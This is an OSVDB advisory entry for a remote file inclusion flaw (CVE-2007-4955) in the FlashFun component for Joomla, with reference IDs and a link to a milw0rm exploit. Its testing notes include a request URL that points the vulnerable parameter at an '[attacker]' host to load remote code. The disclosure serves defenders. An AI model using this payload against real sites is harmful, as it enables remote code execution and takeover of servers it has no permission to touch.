FlashFun for Joomla! admin.joomlaflashfun.php mosConfig_live_site Variable Remote File Inclusion

2007-09-16T00:00:00
ID OSVDB:37139
Type osvdb
Reporter OSVDB
Modified 2007-09-16T00:00:00

Description

Manual Testing Notes

http://[target]/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=[attacker]

References:

Vendor URL: http://www.renevanasten.net/downloads/joomlacomponents.html Secunia Advisory ID:26799 ISS X-Force ID: 36638 Generic Exploit URL: http://www.milw0rm.com/exploits/4415 CVE-2007-4955 Bugtraq ID: 25680